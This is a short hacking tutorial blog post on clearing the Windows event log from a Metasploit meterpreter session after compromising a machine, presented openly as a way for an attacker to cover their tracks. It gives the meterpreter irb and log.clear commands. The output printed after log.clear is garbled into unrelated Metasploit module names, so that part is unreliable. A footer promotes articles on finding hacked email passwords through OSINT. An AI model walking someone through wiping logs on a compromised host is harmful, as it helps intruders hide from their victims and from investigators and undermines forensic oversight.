Remove Event Log – Cover Track After Hacking Metasploit

There are so many ways to hack into a computer but after comprising the computer an attacker (hacker) needs to cover their track because each and every activity that a hacker do (or a normal user do) is recorded by the system. So whenever a hacker hack into a web server or a computer than after doing the work an attacker usually cover the track so that no one is able to catch them. How to cover your track after hacking or how a hacker cover their track is an important topic of discussion and need more tutorial because every operating system has its own way to maintain the logs.
Log files contain the information of every activity that has been done on a computer so it is very important to remove this log file. There are different way to remove log files on windows, Linux and MAC but in this tutorial I will show you how to remove event log management by using Metasploit post exploitation tutorial for windows.


  • Metasploit (Backtrack 5 r1 using for tutorial, you can use some other too)
  • A compromised host (it is very easy to hack into windows by using metasploit, as discussed before if you don’t know how than let us know I will share the link of the previous tutorial)
  • A brain
Now let suppose you have hacked a windows operating system and you have a meterpreter session than you can do multiple things via meterpreter session like you can cover your track by removing the log file. The picture below shows that how a windows maintain logs that an attacker need to remove.

On our meterpreter session we need to call a post exploitation script that is available and has been given with metasploit (you can create some more script too). Lets call irb

meterpreter > irb
[*] Starting IRB shell
[*] The ‘client’ variable holds the meterpreter client
>> client.sys.config.sysinfo()
=> {“Computer”=>”VIRTUAL-7C33D2A”, “OS”=>”Windows XP (Build 2600, Service Pack 2).”, “Architecture”=>”x86”, “System Language”=>”en_US”}

Than we need to clear the log it requires an easy command.

>> log.clear
=> #<#:0xb6779424 @client=#>,
/trendmicro_serverprotect_earthagent”=>#, “windows/browser/ie_iscomponentinstalled”=>#, “windows/exec/reverse_ord_tcp”=>#, “windows/http/apache_chunked”=>#, “windows/imap/novell_netmail_append”=>#

Thats it.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

How to Become an Expert in Ethical Hacking

This article is mainly addressing the audience who wants to pursue their career in Cybersecurity as a professional that provides ethical hacking services, whether...

5 Cybersecurity Tips to Keep in Mind When Working From Home

  Due to the ongoing global health crisis, more and more people are being forced to work from their homes. In fact, Forbes estimates that about...

The Complete OSINT Tutorial to Find Personal Information About Anyone

This article mainly focuses on how to discover a person's digital footprint and gather personal data by using open-source intelligence (OSINT). So, in its...

How to find the password of hacked email addresses using OSINT

Open-source intelligence or OSINT is a potent technique, and it can give a lot of valuable information, if implemented correctly with the right strategy...